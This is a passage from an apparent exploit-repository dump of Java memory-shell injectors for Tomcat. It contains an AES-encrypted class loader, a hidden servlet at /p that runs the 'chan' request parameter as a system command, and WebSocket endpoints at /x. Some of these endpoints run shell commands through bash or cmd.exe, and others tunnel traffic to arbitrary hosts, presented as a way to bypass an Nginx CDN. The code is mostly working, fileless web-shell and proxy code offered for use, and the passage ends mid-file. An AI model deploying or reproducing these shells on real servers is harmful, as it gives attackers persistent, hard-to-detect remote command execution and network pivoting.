92 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
93 | RushThere(Lclass,cl,session,request,pageContext);
94 | }
95 | }
96 | }
97 |
98 | public void RushThere(Class Lclass, ClassLoader cl, HttpSession session, HttpServletRequest request,Map pageContext){
99 | byte[] bytecode = java.util.Base64.getDecoder().decode("yv66vgAAADQAGgoABAAUCgAEABUHABYHABcBAAY8aW5pdD4BABooTGphdmEvbGFuZy9DbGFzc0xvYWRlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQADTFU7AQABYwEAF0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQABZwEAFShbQilMamF2YS9sYW5nL0NsYXNzOwEAAWIBAAJbQgEAClNvdXJjZUZpbGUBAAZVLmphdmEMAAUABgwAGAAZAQABVQEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgEAC2RlZmluZUNsYXNzAQAXKFtCSUkpTGphdmEvbGFuZy9DbGFzczsAIQADAAQAAAAAAAIAAAAFAAYAAQAHAAAAOgACAAIAAAAGKiu3AAGxAAAAAgAIAAAABgABAAAAAgAJAAAAFgACAAAABgAKAAsAAAAAAAYADAANAAEAAQAOAA8AAQAHAAAAPQAEAAIAAAAJKisDK763AAKwAAAAAgAIAAAABgABAAAAAwAJAAAAFgACAAAACQAKAAsAAAAAAAkAEAARAAEAAQASAAAAAgAT");
100 | try {
101 | java.lang.reflect.Method define = Lclass.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
102 | define.setAccessible(true);
103 | Class uclass = null;
104 | try {
105 | uclass = cl.loadClass("U");
106 | } catch (ClassNotFoundException e) {
107 | uclass = (Class) define.invoke(cl, bytecode, 0, bytecode.length);
108 | }
109 | Constructor constructor = uclass.getDeclaredConstructor(ClassLoader.class);
110 | constructor.setAccessible(true);
111 | Object u = constructor.newInstance(this.getClass().getClassLoader());
112 | Method Um = uclass.getDeclaredMethod("g", byte[].class);
113 | Um.setAccessible(true);
114 | String k = pa;
115 | session.setAttribute("u", k);
116 | Cipher c = Cipher.getInstance("AES");
117 | c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
118 | byte[] eClassBytes = c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()));
119 | Class eclass = (Class) Um.invoke(u, eClassBytes);
120 | Object a = eclass.newInstance();
121 | Method b = eclass.getDeclaredMethod("equals", Object.class);
122 | b.setAccessible(true);
123 | b.invoke(a, pageContext);
124 | return;
125 | }catch (Exception ig){
126 | ig.printStackTrace();
127 | }
128 | }
129 | }
130 |
131 |
--------------------------------------------------------------------------------
/lib/exploit/servlet/tomcat89/SRain.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/servlet/tomcat89/SRain.class
--------------------------------------------------------------------------------
/lib/exploit/servlet/tomcat89/SRain.java:
--------------------------------------------------------------------------------
1 | import org.apache.catalina.Container;
2 | import org.apache.catalina.Wrapper;
3 | import org.apache.catalina.core.StandardContext;
4 | import org.apache.catalina.loader.WebappClassLoaderBase;
5 |
6 | import javax.servlet.*;
7 | import javax.servlet.http.HttpServletRequest;
8 | import javax.servlet.http.HttpServletResponse;
9 | import java.io.IOException;
10 | import java.lang.reflect.Method;
11 |
12 | public class SRain implements Servlet {
13 |
14 | static{
15 | try{
16 | WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
17 | StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();
18 |
19 | SRain greetServlet = new SRain();
20 |
21 | Method createWrapper = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredMethod("createWrapper");
22 | Wrapper greetWrapper = (Wrapper) createWrapper.invoke(standardContext);
23 |
24 | Method gname = Container.class.getDeclaredMethod("setName", String.class);
25 | gname.invoke(greetWrapper,"p");
26 |
27 | Method gload = Wrapper.class.getDeclaredMethod("setLoadOnStartup", int.class);
28 | gload.invoke(greetWrapper,1);
29 |
30 | Method gservlet = Wrapper.class.getDeclaredMethod("setServlet", Servlet.class);
31 | gservlet.invoke(greetWrapper,greetServlet);
32 |
33 | Method gclass = Wrapper.class.getDeclaredMethod("setServletClass", String.class);
34 | gclass.invoke(greetWrapper,greetServlet.getClass().getName());
35 |
36 | Method gchild = StandardContext.class.getDeclaredMethod("addChild",Container.class);
37 | gchild.invoke(standardContext,greetWrapper);
38 |
39 | Method gmap = StandardContext.class.getDeclaredMethod("addServletMappingDecoded",String.class,String.class,boolean.class);
40 | gmap.invoke(standardContext,"/p", "p",false);
41 | }catch (Exception hi){
42 | //hi.printStackTrace();
43 | }
44 | }
45 |
46 | @Override
47 | public void init(ServletConfig config) throws ServletException {}
48 |
49 | @Override
50 | public String getServletInfo() {return null;}
51 |
52 | @Override
53 | public void destroy() {} public ServletConfig getServletConfig() {return null;}
54 |
55 | @Override
56 | public void service(ServletRequest servletRequest, ServletResponse servletResponse) throws ServletException, IOException {
57 | HttpServletRequest req = (HttpServletRequest) servletRequest;
58 | HttpServletResponse resp = (HttpServletResponse) servletResponse;
59 | if (req.getParameter("chan") != null){
60 | Process process = Runtime.getRuntime().exec(req.getParameter("chan"));
61 | java.io.BufferedReader bufferedReader = new java.io.BufferedReader(
62 | new java.io.InputStreamReader(process.getInputStream()));
63 | StringBuilder stringBuilder = new StringBuilder();
64 | String line;
65 | while ((line = bufferedReader.readLine()) != null) {
66 | stringBuilder.append(line + '\n');
67 | }
68 | servletResponse.getOutputStream().write(stringBuilder.toString().getBytes());
69 | servletResponse.getOutputStream().flush();
70 | servletResponse.getOutputStream().close();
71 | return;
72 | }
73 | else{
74 | resp.sendError(HttpServletResponse.SC_NOT_FOUND);
75 | }
76 | }
77 | }
78 |
--------------------------------------------------------------------------------
/lib/exploit/websocket/BypassNginxCDN/CmdEndpoint.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/BypassNginxCDN/CmdEndpoint.class
--------------------------------------------------------------------------------
/lib/exploit/websocket/BypassNginxCDN/CmdEndpoint.java:
--------------------------------------------------------------------------------
1 | import java.io.IOException;
2 | import java.util.*;
3 | import java.io.InputStream;
4 | import java.lang.reflect.Field;
5 | import javax.servlet.ServletContext;
6 | import javax.servlet.ServletException;
7 | import javax.servlet.http.HttpServletRequest;
8 | import javax.servlet.http.HttpServletResponse;
9 | import javax.websocket.Endpoint;
10 | import javax.websocket.Session;
11 | import javax.websocket.EndpointConfig;
12 | import javax.websocket.MessageHandler;
13 | import javax.websocket.server.ServerContainer;
14 | import javax.websocket.server.ServerEndpointConfig;
15 | import org.apache.tomcat.websocket.server.WsServerContainer;
16 | import org.apache.tomcat.websocket.server.UpgradeUtil;
17 | import org.apache.tomcat.util.http.MimeHeaders;
18 |
19 | public class CmdEndpoint extends Endpoint implements MessageHandler.Whole {
20 | private Session session;
21 |
22 | @Override
23 | public void onMessage(String s) {
24 | try {
25 | Process process;
26 | boolean bool = System.getProperty("os.name").toLowerCase().startsWith("windows");
27 | if (bool) {
28 | process = Runtime.getRuntime().exec(new String[]{"cmd.exe", "/c", s});
29 | } else {
30 | process = Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", s});
31 | }
32 | InputStream inputStream = process.getInputStream();
33 | StringBuilder stringBuilder = new StringBuilder();
34 | int i;
35 | while ((i = inputStream.read()) != -1)
36 | stringBuilder.append((char) i);
37 | inputStream.close();
38 | process.waitFor();
39 | session.getBasicRemote().sendText(stringBuilder.toString());
40 | } catch (Exception exception) {
41 | exception.printStackTrace();
42 | }
43 | }
44 |
45 | @Override
46 | public void onOpen(final Session session, EndpointConfig config) {
47 | this.session = session;
48 | session.addMessageHandler(this);
49 | }
50 |
51 | private void SetHeader(HttpServletRequest request, String key, String value) {
52 | Class requestClass = request.getClass();
53 | try {
54 | Field requestField = requestClass.getDeclaredField("request");
55 | requestField.setAccessible(true);
56 | Object requestObj = requestField.get(request);
57 | Field coyoteRequestField = requestObj.getClass().getDeclaredField("coyoteRequest");
58 | coyoteRequestField.setAccessible(true);
59 | Object coyoteRequestObj = coyoteRequestField.get(requestObj);
60 | Field headersField = coyoteRequestObj.getClass().getDeclaredField("headers");
61 | headersField.setAccessible(true);
62 | MimeHeaders headersObj = (MimeHeaders) headersField.get(coyoteRequestObj);
63 | headersObj.removeHeader(key);
64 | headersObj.addValue(key).setString(value);
65 | } catch (Exception e) {
66 | e.printStackTrace();
67 | }
68 | }
69 | static {
70 | HttpServletRequest request = null;
71 | HttpServletResponse response = null;
72 | ServletContext servletContext = request.getSession().getServletContext();
73 | ServerEndpointConfig configEndpoint = ServerEndpointConfig.Builder.create(CmdEndpoint.class, "/x").build();
74 | WsServerContainer container = (WsServerContainer) servletContext.getAttribute(ServerContainer.class.getName());
75 | Map pathParams = Collections.emptyMap();
76 | CmdEndpoint cmdEndpoint = new CmdEndpoint();
77 | cmdEndpoint.SetHeader(request, "Connection", "upgrade");
78 | cmdEndpoint.SetHeader(request, "Sec-WebSocket-Version", "13");
79 | cmdEndpoint.SetHeader(request, "Upgrade", "websocket");
80 | try {
81 | UpgradeUtil.doUpgrade(container, request, response, configEndpoint, pathParams);
82 | } catch (ServletException e) {
83 | e.printStackTrace();
84 | } catch (IOException e) {
85 | e.printStackTrace();
86 | }
87 | }
88 | }
89 |
--------------------------------------------------------------------------------
/lib/exploit/websocket/BypassNginxCDN/CmdEndpoint2.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/BypassNginxCDN/CmdEndpoint2.class
--------------------------------------------------------------------------------
/lib/exploit/websocket/BypassNginxCDN/CmdEndpoint2.java:
--------------------------------------------------------------------------------
1 |
2 | import java.util.*;
3 | import java.io.InputStream;
4 | import javax.servlet.ServletContext;
5 | import javax.servlet.http.HttpServletRequest;
6 | import javax.servlet.http.HttpServletResponse;
7 | import javax.websocket.server.ServerContainer;
8 | import javax.websocket.server.ServerEndpointConfig;
9 | import org.apache.tomcat.websocket.server.WsServerContainer;
10 | import org.apache.tomcat.websocket.Constants;
11 | import javax.websocket.*;
12 | import org.apache.tomcat.websocket.server.WsHandshakeRequest;
13 | import org.apache.tomcat.websocket.WsHandshakeResponse;
14 | import java.nio.charset.StandardCharsets;
15 | import org.apache.tomcat.util.codec.binary.Base64;
16 | import org.apache.tomcat.util.security.ConcurrentMessageDigest;
17 | import org.apache.tomcat.websocket.server.WsHttpUpgradeHandler;
18 | import org.apache.tomcat.websocket.Transformation;
19 | import org.apache.catalina.connector.RequestFacade;
20 |
21 | public class CmdEndpoint2 extends Endpoint implements MessageHandler.Whole {
22 | private Session session;
23 | @Override
24 | public void onMessage(String s) {
25 | try {
26 | Process process;
27 | boolean bool = System.getProperty("os.name").toLowerCase().startsWith("windows");
28 | if (bool) {
29 | process = Runtime.getRuntime().exec(new String[] { "cmd.exe", "/c", s });
30 | } else {
31 | process = Runtime.getRuntime().exec(new String[] { "/bin/bash", "-c", s });
32 | }
33 | InputStream inputStream = process.getInputStream();
34 | StringBuilder stringBuilder = new StringBuilder();
35 | int i;
36 | while ((i = inputStream.read()) != -1)
37 | stringBuilder.append((char)i);
38 | inputStream.close();
39 | process.waitFor();
40 | session.getBasicRemote().sendText(stringBuilder.toString());
41 | } catch (Exception exception) {
42 | exception.printStackTrace();
43 | }
44 | }
45 | @Override
46 | public void onOpen(final Session session, EndpointConfig config) {
47 | this.session = session;
48 | session.addMessageHandler(this);
49 | }
50 |
51 | private static String getWebSocketAccept(String key) {
52 | byte[] WS_ACCEPT = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11".getBytes(StandardCharsets.ISO_8859_1);
53 | byte[] digest = ConcurrentMessageDigest.digestSHA1(key.getBytes(StandardCharsets.ISO_8859_1), WS_ACCEPT);
54 | return Base64.encodeBase64String(digest);
55 | }
56 | static {
57 | HttpServletRequest request =null;
58 | HttpServletResponse response = null;
59 | Map pathParams = Collections.emptyMap();
60 | List negotiatedExtensionsPhase = Collections.emptyList();
61 | Transformation transformation = null;
62 | String subProtocol = null;
63 | ServletContext servletContext = request.getSession().getServletContext();
64 | ServerEndpointConfig configEndpoint = ServerEndpointConfig.Builder.create(CmdEndpoint2.class, "/x").build();
65 | WsServerContainer container = (WsServerContainer) servletContext.getAttribute(ServerContainer.class.getName());
66 | response.setHeader(Constants.UPGRADE_HEADER_NAME, Constants.UPGRADE_HEADER_VALUE);
67 | response.setHeader(Constants.CONNECTION_HEADER_NAME, Constants.CONNECTION_HEADER_VALUE);
68 | response.setHeader(HandshakeResponse.SEC_WEBSOCKET_ACCEPT, getWebSocketAccept(request.getHeader("Sec-WebSocket-Key")));
69 | response.setStatus(101);
70 | WsHandshakeRequest wsRequest = new WsHandshakeRequest(request, pathParams);
71 | WsHandshakeResponse wsResponse = new WsHandshakeResponse();
72 | configEndpoint.getConfigurator().modifyHandshake(configEndpoint, wsRequest, wsResponse);
73 | try {
74 | WsHttpUpgradeHandler wsHandler = ((RequestFacade)request).upgrade(WsHttpUpgradeHandler.class); //RequestFacade use for Tomcat 7
75 | wsHandler.preInit(configEndpoint, container, wsRequest, negotiatedExtensionsPhase, subProtocol, transformation, pathParams, request.isSecure());
76 | // Tomcat 7 //wsHandler.preInit((Endpoint)configEndpoint, configEndpoint, container, wsRequest, negotiatedExtensionsPhase2, subProtocol, transformation, pathParams, request.isSecure());
77 | }catch (Exception e) {
78 | e.printStackTrace();
79 | }
80 | }
81 | }
82 |
--------------------------------------------------------------------------------
/lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint$1.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint$1.class
--------------------------------------------------------------------------------
/lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint$2.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint$2.class
--------------------------------------------------------------------------------
/lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint$Attach.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint$Attach.class
--------------------------------------------------------------------------------
/lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint.class
--------------------------------------------------------------------------------
/lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint.java:
--------------------------------------------------------------------------------
1 | import java.io.IOException;
2 | import java.util.*;
3 | import javax.servlet.ServletContext;
4 | import javax.servlet.ServletException;
5 | import javax.servlet.http.HttpServletRequest;
6 | import javax.servlet.http.HttpServletResponse;
7 | import javax.websocket.server.ServerContainer;
8 | import javax.websocket.server.ServerEndpointConfig;
9 | import org.apache.tomcat.websocket.server.WsServerContainer;
10 | import org.apache.tomcat.websocket.server.UpgradeUtil;
11 | import org.apache.tomcat.util.http.MimeHeaders;
12 | import java.io.ByteArrayOutputStream;
13 | import java.nio.channels.AsynchronousSocketChannel;
14 | import java.nio.ByteBuffer;
15 | import java.nio.channels.CompletionHandler;
16 | import java.net.InetSocketAddress;
17 | import java.util.concurrent.Future;
18 | import java.util.concurrent.TimeUnit;
19 | import java.lang.reflect.Field;
20 | import javax.websocket.*;
21 |
22 | public class ProxyEndpoint extends Endpoint {
23 | long i =0;
24 | ByteArrayOutputStream baos = new ByteArrayOutputStream();
25 | HashMap map = new HashMap();
26 | static class Attach {
27 | public AsynchronousSocketChannel client;
28 | public Session channel;
29 | }
30 | void readFromServer(Session channel,AsynchronousSocketChannel client){
31 | final ByteBuffer buffer = ByteBuffer.allocate(50000);
32 | Attach attach = new Attach();
33 | attach.client = client;
34 | attach.channel = channel;
35 | client.read(buffer, attach, new CompletionHandler() {
36 | @Override
37 | public void completed(Integer result, final Attach scAttachment) {
38 | buffer.clear();
39 | try {
40 | if(buffer.hasRemaining() && result>=0)
41 | {
42 | byte[] arr = new byte[result];
43 | ByteBuffer b = buffer.get(arr,0,result);
44 | baos.write(arr,0,result);
45 | ByteBuffer q = ByteBuffer.wrap(baos.toByteArray());
46 | if (scAttachment.channel.isOpen()) {
47 | scAttachment.channel.getBasicRemote().sendBinary(q);
48 | }
49 | baos = new ByteArrayOutputStream();
50 | readFromServer(scAttachment.channel,scAttachment.client);
51 | }else{
52 | if(result > 0)
53 | {
54 | byte[] arr = new byte[result];
55 | ByteBuffer b = buffer.get(arr,0,result);
56 | baos.write(arr,0,result);
57 | readFromServer(scAttachment.channel,scAttachment.client);
58 | }
59 | }
60 | } catch (Exception ignored) {}
61 | }
62 | @Override
63 | public void failed(Throwable t, Attach scAttachment) {t.printStackTrace();}
64 | });
65 | }
66 | void process(ByteBuffer z,Session channel)
67 | {
68 | try{
69 | if(i>1)
70 | {
71 | AsynchronousSocketChannel client = map.get(channel.getId());
72 | client.write(z).get();
73 | z.flip();
74 | z.clear();
75 | }
76 | else if(i==1)
77 | {
78 | String values = new String(z.array());
79 | String[] array = values.split(" ");
80 | String[] addrarray = array[1].split(":");
81 | AsynchronousSocketChannel client = AsynchronousSocketChannel.open();
82 | int po = Integer.parseInt(addrarray[1]);
83 | InetSocketAddress hostAddress = new InetSocketAddress(addrarray[0], po);
84 | Future future = client.connect(hostAddress);
85 | try {
86 | future.get(10, TimeUnit.SECONDS);
87 | } catch(Exception ignored){
88 | channel.getBasicRemote().sendText("HTTP/1.1 503 Service Unavailable\r\n\r\n");
89 | return;
90 | }
91 | map.put(channel.getId(), client);
92 | readFromServer(channel,client);
93 | channel.getBasicRemote().sendText("HTTP/1.1 200 Connection Established\r\n\r\n");
94 | }
95 | }catch(Exception ignored){
96 | }
97 | }
98 | @Override
99 | public void onOpen(final Session session, EndpointConfig config) {
100 | i=0;
101 | session.setMaxBinaryMessageBufferSize(1024*1024*20);
102 | session.setMaxTextMessageBufferSize(1024*1024*20);
103 | session.addMessageHandler(new MessageHandler.Whole() {
104 | @Override
105 | public void onMessage(ByteBuffer message) {
106 | try {
107 | message.clear();
108 | i++;
109 | process(message,session);
110 | } catch (Exception ignored) {
111 | }
112 | }
113 | });
114 | }
115 |
116 | private void SetHeader(HttpServletRequest request, String key, String value) {
117 | Class requestClass = request.getClass();
118 | try {
119 | Field requestField = requestClass.getDeclaredField("request");
120 | requestField.setAccessible(true);
121 | Object requestObj = requestField.get(request);
122 | Field coyoteRequestField = requestObj.getClass().getDeclaredField("coyoteRequest");
123 | coyoteRequestField.setAccessible(true);
124 | Object coyoteRequestObj = coyoteRequestField.get(requestObj);
125 | Field headersField = coyoteRequestObj.getClass().getDeclaredField("headers");
126 | headersField.setAccessible(true);
127 | MimeHeaders headersObj = (MimeHeaders) headersField.get(coyoteRequestObj);
128 | headersObj.removeHeader(key);
129 | headersObj.addValue(key).setString(value);
130 | } catch (Exception e) {
131 | e.printStackTrace();
132 | }
133 | }
134 | static {
135 | HttpServletRequest request = null;
136 | HttpServletResponse response = null;
137 | ServletContext servletContext = request.getSession().getServletContext();
138 | ServerEndpointConfig configEndpoint = ServerEndpointConfig.Builder.create(ProxyEndpoint.class, "/x").build();
139 | WsServerContainer container = (WsServerContainer) servletContext.getAttribute(ServerContainer.class.getName());
140 | Map pathParams = Collections.emptyMap();
141 | ProxyEndpoint proxyEndpoint = new ProxyEndpoint();
142 | proxyEndpoint.SetHeader(request, "Sec-WebSocket-Key" , request.getHeader("Sec-WebSocket-Key"));
143 | proxyEndpoint.SetHeader(request,"Connection","Upgrade");
144 | proxyEndpoint.SetHeader(request,"Sec-WebSocket-Version","13");
145 | proxyEndpoint.SetHeader(request,"Upgrade","websocket");
146 | try {
147 | UpgradeUtil.doUpgrade(container, request, response, configEndpoint, pathParams);
148 | } catch (ServletException e) {
149 | e.printStackTrace();
150 | } catch (IOException e) {
151 | e.printStackTrace();
152 | }
153 | }
154 | }
155 |
--------------------------------------------------------------------------------
/lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint2$1.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint2$1.class
--------------------------------------------------------------------------------
/lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint2$2.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint2$2.class
--------------------------------------------------------------------------------
/lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint2$Attach.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint2$Attach.class
--------------------------------------------------------------------------------
/lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint2.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint2.class
--------------------------------------------------------------------------------
/lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint2.java:
--------------------------------------------------------------------------------
1 | import java.io.IOException;
2 | import java.io.PrintWriter;
3 | import java.util.*;
4 | import javax.servlet.ServletContext;
5 | import javax.servlet.http.HttpServletRequest;
6 | import javax.servlet.http.HttpServletRequestWrapper;
7 | import javax.servlet.http.HttpServletResponse;
8 | import javax.websocket.server.ServerContainer;
9 | import javax.websocket.server.ServerEndpointConfig;
10 | import org.apache.tomcat.websocket.server.WsServerContainer;
11 | import org.apache.tomcat.websocket.Constants;
12 | import javax.websocket.*;
13 | import org.apache.tomcat.websocket.server.WsHandshakeRequest;
14 | import org.apache.tomcat.websocket.WsHandshakeResponse;
15 | import java.nio.charset.StandardCharsets;
16 | import org.apache.tomcat.util.codec.binary.Base64;
17 | import org.apache.tomcat.util.security.ConcurrentMessageDigest;
18 | import org.apache.tomcat.websocket.Transformation;
19 | import org.apache.catalina.connector.RequestFacade;
20 | import org.apache.tomcat.websocket.server.WsHttpUpgradeHandler;
21 | import java.nio.ByteBuffer;
22 | import java.nio.channels.AsynchronousSocketChannel;
23 | import java.net.InetSocketAddress;
24 | import java.util.concurrent.Future;
25 | import java.util.concurrent.TimeUnit;
26 | import java.io.ByteArrayOutputStream;
27 | import java.nio.channels.CompletionHandler;
28 |
29 | public class ProxyEndpoint2 extends Endpoint {
30 | long i =0;
31 | ByteArrayOutputStream baos = new ByteArrayOutputStream();
32 | HashMap map = new HashMap();
33 | static class Attach {
34 | public AsynchronousSocketChannel client;
35 | public Session channel;
36 | }
37 | void readFromServer(Session channel,AsynchronousSocketChannel client){
38 | final ByteBuffer buffer = ByteBuffer.allocate(50000);
39 | Attach attach = new Attach();
40 | attach.client = client;
41 | attach.channel = channel;
42 | client.read(buffer, attach, new CompletionHandler() {
43 | @Override
44 | public void completed(Integer result, final Attach scAttachment) {
45 | buffer.clear();
46 | try {
47 | if(buffer.hasRemaining() && result>=0)
48 | {
49 | byte[] arr = new byte[result];
50 | ByteBuffer b = buffer.get(arr,0,result);
51 | baos.write(arr,0,result);
52 | ByteBuffer q = ByteBuffer.wrap(baos.toByteArray());
53 | if (scAttachment.channel.isOpen()) {
54 | scAttachment.channel.getBasicRemote().sendBinary(q);
55 | }
56 | baos = new ByteArrayOutputStream();
57 | readFromServer(scAttachment.channel,scAttachment.client);
58 | }else{
59 | if(result > 0)
60 | {
61 | byte[] arr = new byte[result];
62 | ByteBuffer b = buffer.get(arr,0,result);
63 | baos.write(arr,0,result);
64 | readFromServer(scAttachment.channel,scAttachment.client);
65 | }
66 | }
67 | } catch (Exception ignored) {}
68 | }
69 | @Override
70 | public void failed(Throwable t, Attach scAttachment) {t.printStackTrace();}
71 | });
72 | }
73 | void process(ByteBuffer z,Session channel)
74 | {
75 | try{
76 | if(i>1)
77 | {
78 | AsynchronousSocketChannel client = map.get(channel.getId());
79 | client.write(z).get();
80 | z.flip();
81 | z.clear();
82 | }
83 | else if(i==1)
84 | {
85 | String values = new String(z.array());
86 | String[] array = values.split(" ");
87 | String[] addrarray = array[1].split(":");
88 | AsynchronousSocketChannel client = AsynchronousSocketChannel.open();
89 | int po = Integer.parseInt(addrarray[1]);
90 | InetSocketAddress hostAddress = new InetSocketAddress(addrarray[0], po);
91 | Future future = client.connect(hostAddress);
92 | try {
93 | future.get(10, TimeUnit.SECONDS);
94 | } catch(Exception ignored){
95 | channel.getBasicRemote().sendText("HTTP/1.1 503 Service Unavailable\r\n\r\n");
96 | return;
97 | }
98 | map.put(channel.getId(), client);
99 | readFromServer(channel,client);
100 | channel.getBasicRemote().sendText("HTTP/1.1 200 Connection Established\r\n\r\n");
101 | }
102 | }catch(Exception ignored){
103 | }
104 | }
105 | @Override
106 | public void onOpen(final Session session, EndpointConfig config) {
107 | i=0;
108 | session.setMaxBinaryMessageBufferSize(1024*1024*20);
109 | session.setMaxTextMessageBufferSize(1024*1024*20);
110 | session.addMessageHandler(new MessageHandler.Whole() {
111 | @Override
112 | public void onMessage(ByteBuffer message) {
113 | try {
114 | message.clear();
115 | i++;
116 | process(message,session);
117 | } catch (Exception ignored) {
118 | }
119 | }
120 | });
121 | }
122 | private static RequestFacade getRequestFacade(HttpServletRequest request) {
123 | if (request instanceof RequestFacade) {
124 | return (RequestFacade) request;
125 | }
126 | else if (request instanceof HttpServletRequestWrapper) {
127 | HttpServletRequestWrapper wrapper = (HttpServletRequestWrapper) request;
128 | HttpServletRequest wrappedRequest = (HttpServletRequest) wrapper.getRequest();
129 | return getRequestFacade(wrappedRequest);
130 | }
131 | else {
132 | throw new IllegalArgumentException("Cannot convert [" + request.getClass() + "] to org.apache.catalina.connector.RequestFacade");
133 | }
134 | }
135 | private static String getWebSocketAccept(String key) {
136 | byte[] WS_ACCEPT = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11".getBytes(StandardCharsets.ISO_8859_1);
137 | byte[] digest = ConcurrentMessageDigest.digestSHA1(key.getBytes(StandardCharsets.ISO_8859_1), WS_ACCEPT);
138 | return Base64.encodeBase64String(digest);
139 | }
140 | static {
141 | HttpServletRequest request = null;
142 | HttpServletResponse response = null;
143 | PrintWriter out = null;
144 | try {
145 | out = response.getWriter();
146 | } catch (IOException e) {
147 | e.printStackTrace();
148 | }
149 | ServletContext servletContext = request.getSession().getServletContext();
150 | ServerEndpointConfig configEndpoint = ServerEndpointConfig.Builder.create(ProxyEndpoint2.class, "/x").build();
151 | WsServerContainer container = (WsServerContainer) servletContext.getAttribute(ServerContainer.class.getName());
152 | Map pathParams = Collections.emptyMap();
153 | response.setHeader(Constants.UPGRADE_HEADER_NAME, Constants.UPGRADE_HEADER_VALUE);
154 | response.setHeader(Constants.CONNECTION_HEADER_NAME, Constants.CONNECTION_HEADER_VALUE);
155 | response.setHeader(HandshakeResponse.SEC_WEBSOCKET_ACCEPT, getWebSocketAccept(request.getHeader("Sec-WebSocket-Key")));
156 | response.setStatus(101);
157 | WsHandshakeRequest wsRequest = new WsHandshakeRequest(request, pathParams);
158 | WsHandshakeResponse wsResponse = new WsHandshakeResponse();
159 | configEndpoint.getConfigurator().modifyHandshake(configEndpoint, wsRequest, wsResponse);
160 | try {
161 | List negotiatedExtensionsPhase2 = Collections.emptyList();
162 | Transformation transformation = null;
163 | String subProtocol = null;
164 | RequestFacade requestFacade = getRequestFacade(request);
165 | WsHttpUpgradeHandler wsHandler = requestFacade.upgrade(WsHttpUpgradeHandler.class);
166 | if (wsHandler != null) {
167 | // Tomcat 8 preInit
168 | wsHandler.preInit(configEndpoint, container, wsRequest, negotiatedExtensionsPhase2, subProtocol, transformation, pathParams, request.isSecure());
169 | // Tomcat 7 preInit
170 | // Endpoint ep = (Endpoint)configEndpoint.getConfigurator().getEndpointInstance(configEndpoint.getEndpointClass());
171 | // wsHandler.preInit(ep, configEndpoint, container, wsRequest, negotiatedExtensionsPhase2, subProtocol, transformation, pathParams, request.isSecure());
172 | }
173 | }catch (Exception e) {
174 | out.println(e.toString());
175 | out.flush();
176 | out.close();
177 | }
178 | }
179 | }
180 |
--------------------------------------------------------------------------------
/lib/exploit/websocket/Tomcat_Spring_Jetty/WebSocket_Proxy.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/Tomcat_Spring_Jetty/WebSocket_Proxy.class
--------------------------------------------------------------------------------
/lib/exploit/websocket/Tomcat_Spring_Jetty/WebSocket_Proxy.java:
--------------------------------------------------------------------------------
1 | import java.io.ByteArrayOutputStream;
2 | import java.net.InetSocketAddress;
3 | import java.nio.ByteBuffer;
4 | import java.nio.channels.AsynchronousSocketChannel;
5 | import java.nio.channels.CompletionHandler;
6 | import java.util.HashMap;
7 | import java.util.concurrent.Future;
8 | import java.util.concurrent.TimeUnit;
